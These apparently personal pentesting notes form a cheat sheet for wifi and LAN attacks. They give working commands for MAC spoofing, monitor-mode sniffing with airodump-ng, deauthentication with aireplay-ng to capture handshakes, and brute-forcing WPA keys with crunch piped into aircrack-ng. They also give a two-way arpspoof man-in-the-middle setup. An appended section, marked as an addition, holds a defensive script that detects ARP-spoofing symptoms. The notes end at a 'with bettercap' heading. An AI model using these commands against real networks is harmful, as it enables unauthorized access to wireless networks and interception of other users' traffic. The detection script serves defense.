WIFI
display all network interfaces
ifconfig
display all wireless network interfaces
iwconfig
turn on/off a specific network interface
ifconfig wlan0 down
ifconfig wlan0 up
change MAC address
Warning: the network interface must be down to change the MAC address.
Warning: the network interface recovers its original MAC address when the OS is rebooted, because the change is only made in memory.
Note: you can find the MAC address of a network interface in the "ether" section of the report generated by ifconfig.
ifconfig wlan0 hw ether 00:11:22:33:44:55
change wireless interface to monitor mode
iwconfig wlan0 mode monitor
sniffing on 5 GHz wireless networks
airodump-ng --band a wlan0
sniffing on 2.4 and 5 GHz wireless networks
airodump-ng --band abg wlan0
sniffing on a specific bssid and channel and write the output in a file
airodump-ng --bssid <enter bssid> --channel <channel number> --write <name of the test> wlan0
deauthentication
Warning: the more packets you send, the longer the client stays disconnected. If you just want to capture the handshake, a value of 4 or 5 is sufficient.
aireplay-ng --deauth <number of packets to send> -a <bssid> -c <client to disconnect mac> wlan0
crunch combined with aircrack-ng
crunch 8 8 01 | aircrack-ng test-01.cap -e F-7FF6A5 -w-
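- 8 8 01 : minimum and maximum length of 8 characters, built only from the characters 0 and 1
- test-01.cap : name of the file containing the handshake
- -e F-7FF6A5 : name (ESSID) of the wifi network
- -w- : no wordlist file, the candidates are read from standard input (the output of crunch)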
crunch
more realistic example using the charset feature of crunch (-f <charset file> <charset name>) and limiting repetitions for lowercase, uppercase, numbers and signs to a maximum of 2 repetitions.
crunch 6 12 -f charset.lst mixalpha-numeric-symbol14-space -d 2@ -d 2, -d 3% -d 2^ | aircrack-ng test-01.cap -e <name of the wifi network> -w-
ARP SPOOFING
With arpspoof
192.168.0.1 = target
192.168.0.254 = router
execute simultaneously
arpspoof -i eth0 -t 192.168.0.1 192.168.0.254
arpspoof -i eth0 -t 192.168.0.254 192.168.0.1
then enable IP forwarding on your local machine (so it acts like a router)
echo 1 > /proc/sys/net/ipv4/ip_forward
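Added example (not part of the original notes): a defender-side check for the ARP cache symptoms that the two arpspoof commands above leave on a host, working on `ip -4 neigh show` output. The MAC addresses, the hosts 192.168.0.66 and 192.168.0.20 and the function names are constructed for illustration.

```shell
#!/bin/sh
# Constructed sample in `ip neigh show` format, as seen on a host being spoofed.
sample_neigh() {
cat <<'EOF'
192.168.0.254 dev eth0 lladdr 02:00:00:00:00:66 REACHABLE
192.168.0.66 dev eth0 lladdr 02:00:00:00:00:66 STALE
192.168.0.20 dev eth0 lladdr 02:00:00:00:00:2a REACHABLE
192.168.0.30 dev eth0  FAILED
fe80::20 dev eth0 lladdr 02:00:00:00:00:2a STALE
EOF
}

# Print "MAC IP IP..." for every MAC mapped to more than one IPv4 address.
# During ARP spoofing the same MAC answers for the router IP and for the
# spoofing host's own IP. A multi-homed router can match too, so review hits.
find_arp_conflicts() {
    awk '
        $1 ~ /:/ { next }        # skip IPv6: one host sharing a MAC across v4/v6 is normal
        {
            mac = ""
            for (i = 1; i < NF; i++)
                if ($i == "lladdr") mac = tolower($(i + 1))
            if (mac == "" || seen[mac, $1]++) next   # FAILED/INCOMPLETE rows have no MAC
            ips[mac] = (count[mac] ? ips[mac] " " : "") $1
            count[mac]++
        }
        END { for (m in count) if (count[m] > 1) print m, ips[m] }
    ' | sort
}

# Return 0 only if gateway IP $1 maps to the pinned (known-good) MAC $2.
# Usage on a live host: ip -4 neigh show | gateway_mac_ok <router ip> <router mac>
gateway_mac_ok() {
    observed=$(awk -v gw="$1" '$1 == gw { for (i = 1; i < NF; i++) if ($i == "lladdr") print tolower($(i + 1)) }')
    [ "$observed" = "$(printf %s "$2" | tr 'A-Z' 'a-z')" ]
}

# Demo on the constructed table: prints the MAC that answers for two addresses.
sample_neigh | find_arp_conflicts
```

The pinned MAC has to be recorded while the network is known to be clean, for example from the router's label or admin page.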
with bettercap